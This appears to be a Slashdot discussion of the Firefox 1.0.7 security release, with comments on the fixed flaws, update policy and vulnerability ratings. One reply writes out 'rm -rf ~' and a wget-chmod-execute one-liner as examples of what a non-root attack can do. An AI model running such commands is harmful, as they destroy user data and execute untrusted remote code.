Firefox 1.0.7 Released

hackajar writes "Firefox 1.0.7 has been released today. From the announcement "Fixes are included for the international domain name (IDN) link buffer overflow vulnerability and the Linux command line URL parsing flaw. There are also other security and stability changes, including a fix for a crash experienced when using certain Proxy Auto-Config scripts. In addition, some regressions introduced by previous 1.0.x security updates have been resolved.""

Quick to the point

[timeToy]

That's perfectly fits with yesterday's news about Mozilla foundation being more reactive to security fixes than M$.

No translated version

[zdzichu]

And yet again, users of localised build were left in the cold.
Think about your grandpa, who doesn't know english. He can't use non-translated build and is left with vulnerable, older version.
Good work, Firefox developers!

Nasty bugs.

[LurkerXXX]

The unix/linux bad-link problem allowing malicious URLs to run shell scripts is a bit nasty. Maybe Symantec wasn't entirely blowing smoke the other day with their warnings about Firefox not really being that much more secure than IE. The patches come out faster, but there sure are some nasty bugs in there yet.

Re:Nasty bugs.

[Zathrus]

Are you running Firefox as root?!?!

`rm -rf ~`

Because, of course, you wouldn't have anything valuable stored in your home directory, would you?

Not to mention that root privledges are not required to do a lot of things... like, oh say:


wget ftp://somesite/malicious_script && chmod +x malicious_script && ./malicious_script


What does malicious script do? Anything it wants -- including downloading and running root kits (after figuring out exactly which ones you are vulnerable to), sending out massive spam attacks, installing a user-level trojan that allows for remote controlled DDoS, etc.

I'm really tired of people claiming that not running as root is a miracle cure. Yes, it prevents some really nasty trivial attacks, but it doesn't protect your most valuable data (e.g. -- yours) and it doesn't prevent a lot of attacks that are perfectly happy to run in non-privledged space.

Re:Nasty bugs.

[miffo.swe]

The problem isnt in Firefox itself but rather in the script used to launch firefox from other applications. It demands launching a command from another application under your control going through bash. You cant be subjected to this by browsing around on the net for example. It demands user intervention to function. While i admit its a flaw its in no way as critical as some purports it to be. A similar flaw in Internet Explorer gets a minor threat rating.

There really needs to be some standard for rating security holes.

I mean, if this is rated very critical what the heck do you call a remote exploit? Very,very,very critical or what? Secunia, rated 7/5?

There seems to be a FUD campaign against Firefox. Why the heck would Symantec care about Firefox when they havent once to my knowledge critiziced Internet Explorer even when it had a critical patch coming out pretty much every day.

Re:Nasty bugs.

[14erCleaner]

There seems to be a FUD campaign against Firefox. Why the heck would Symantec care about Firefox when they havent once to my knowledge critiziced Internet Explorer even when it had a critical patch coming out pretty much every day.

Symantec sells security software that covers up Microsoft vulnerabilities.

If everybody stopped using IE and Outlook, half of their business might go away.

Colour me confused...

[bad_outlook]

Ok, I'm a geek and all, but this week I just installed 1.5 Beta 1 - so is it now vuln to this, whereas 1.0.7 is not? I understand branches, tags and such, but after awhile this could really confuse joe_user. Is anyone trying out the new Opera since it's now free? I've only tried the Win version, but darnit, it's very nice. Tonight I'll try it on Unbuntu, after updating FF to 1.0.7 of course (I don't run dev software at home, else I"ll hear about it crashing from my wife! ;))

Re:Colour me confused...

[Winckle]

I very much doubt Joe Sixpack would be using a beta build of firefox

something concerns me

[Dink+Paisy]

"In addition, some regressions introduced by previous 1.0.x security updates have been resolved."

Too many regressions caused by security updates, and people will turn off auto-update. That's the very reason that Microsoft moved to a monthly update cycle. Getting updates out quickly is important, but unless the security hole is being actively exploited, it's probably more important to make sure nothing else gets broken by the fix. If you convince people not to install updates, then you're in really big trouble.

Re:something concerns me

[amdotaku]

Indeed, this is the dark side to Firefox, its stand alone update cycle. Its not friendly to extension developers, confuses and annoys users and administrators, and worse of all makes the whole Distribution based system the rest of FOSS uses go to pot.(Some people just want to run a version that comes with the distro without constant worrying and compatibility issues.) I think Firefox's special position at the head of the FOSS movement has made them focused too much on runing their own tight ship and not enough about letting their users do the same.

Great!

[setzman]

Now will it stop using anywheres from 73,788 K to 253,000 K RAM? I thought Firefox was supposed to be small and efficient, but that's the ram usage reported by Task Manager.

Re:Don't use your distro tools to install it...

[passthecrackpipe]

Heh, a list of many complex actions involving different user ID's, directories and other computer "magic" as seen from a users perspective, followed by:

"The install was as easy as anything packaged by Vise or InstallShield"

Can you please pass some of that crack you seem to be smoking? I'm a big linux fan, but installing anything, not in the least a user install from firefox, does not compare with the "double click setup.exe" from vise or installshield.

And before all the fanboys knee-jerk with the security/spyware/virus/whatever-my-linux-kung-fu-i s-so-cool-i-kick-your-ass stuff - I know, i use linux and firefox. but that still doesn't make it an easy install. The distro install, incidentally, is pretty easy though, so just wait for the vendor updates mmmkay?

Mod parent +25.

[khasim]

It seems that certain organizations are trying to hype every vulnerability that can be associated with FireFox. From my point of view they'd be ranked like this:

#1. Remote root access that does NOT require human intervention or other app running.

#2. Remote non-root access that does NOT require human intervention or other app running.

#3. Local root access that does NOT require human intervention or other app running.

#4. Local non-root access that does NOT require human intervention or other app running.

#5. Local root access that requires some human interaction or some combination of apps.

#6. Local non-root access that requires some human interaction or some combination of apps (this is where this exploit is)

#7. Remote OS crash

#8. Remote app crash

#9. Local OS crash

#10. Local app crash

This is MY opinion. Get your own opinion. There is no way this exploit is "critical". It's one step above a stupid DoS attack and would NOT affect ANY of my servers.